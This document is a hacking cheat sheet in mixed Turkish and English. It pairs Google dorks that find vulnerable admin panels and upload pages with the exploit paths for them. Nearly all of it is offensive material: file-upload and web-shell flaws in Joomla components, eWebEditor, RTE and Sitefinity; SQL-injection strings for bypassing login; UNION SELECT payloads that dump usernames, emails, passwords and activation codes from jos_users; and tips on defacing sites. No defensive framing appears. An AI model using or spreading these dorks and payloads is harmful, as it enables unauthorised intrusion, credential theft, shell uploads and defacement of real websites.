
inurl:”/admin/saveannounce_upload.asp”


 


inurl:”admin/eWebEditor/Upload.asp”


 


inurl:”UploadFile/upload.asp”


 


WEBWİZ ACİGİ (RTE UPLOAD ACIGI ) 


 


inurl:rte/my_documents/my_files/


inurl:/my_documents/my_files/


exloit: /rte/RTE_popup_file_atch.asp


 


Editör açığı 


 


inurl:editor/assetmanager/ (arama kodu geliştirilebilir)


 


EXPLOİT : /Editor/assetmanager/assetmanager.asp 


 


Joomla upload açıgı 


 


inurl index.php?option=com_expose


 


Exploit: administrator/components/com_expose/uploadimg.php


Uploadin gittigi yer : /components/com_expose/expose/img/


 


Sitefinity: Login upload açıgı 


 


inurl:”Sitefinity: Login”


exploit: Sitefinity/UserControls/Dialogs/ImageEditorDialog.aspx


 


 


 


 


Auto Login For Joomla Dork .:old:.


inurl:/administrator/index.php?autologin=1


 


 


 


---


BYPASS ADMIN ACCESS


 


Dorks:


Code:


inurl:admin.asp


inurl:adminlogin.aspx


inurl:admin/index.php


inurl:administrator.php


inurl:administrator.asp


inurl:login.asp


inurl:login.aspx


inurl:login.php


inurl:admin/index.php


inurl:adminlogin.aspx


 


Code:


‘ or 1=1 –


1'or’1'=’1


admin’–


” or 0=0 –


or 0=0 –


‘ or 0=0 #


” or 0=0 #


or 0=0 #


‘ or ‘x’='x


” or “x”=”x


‘) or (‘x’='x


‘ or 1=1–


” or 1=1–


or 1=1–


‘ or a=a–


” or “a”=”a


‘) or (‘a’='a


“) or (“a”=”a


hi” or “a”=”a


hi” or 1=1 –


hi’ or 1=1 –


hi’ or ‘a’='a


hi’) or (‘a’='a


 


----


Joomla Component com_smartformer shell upload


 


Google Dork inurl:"index.php?option=com_smartformer"


& upload shell.php 


 


Your shell : 


http://localhost/components/com_smartformer/files/yourshell.php


 


---


Ministry Web Designing Multiple Vulnerabilities


exploit bypass to login:


user: '=' 'or'


pass: '=' 'or'


 


Vunlerable Sections:


 


inurl:/downloadcounter/admin/login.php


inurl:/mediaprogram/admin/index.php


inurl:/churchprogram/login.php


----


(Deface)Exploit (Remote Deface ) Joomla Component


Dork : inurl:index.php?option=com_fabrik


Exploit : /index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1


---


[Priv8] Joomla Com_content exploit - defacing joomla websites


 


Dork : 


inurl:index.php?option=com_content & "/mambots/editors/fckeditor"


 


Vulnerable File :


mambots/editors/fckeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php


 


You can exploit this vulnerable joomla component and deface joomla wesbites and you can also sometimes upload your shell


----


exploit joomla "com_artforms" reset password


 


 


Dork : inurl:"option com_artforms"


 


/index.php?option=com_artforms&task=vferforms&id=1+UNION+SELECT+1,2,3,version(),5,concat_ws(email,0x3a,username,0x3a,password)+from+jos_users--


 


/index.php?option=com_user&view=reset


 


/index.php?option=com_artforms&task=vferforms&id=1+UNION+SELECT+1,2,3,version(),5,concat_ws(username,0x3a,activation)+from+jos_users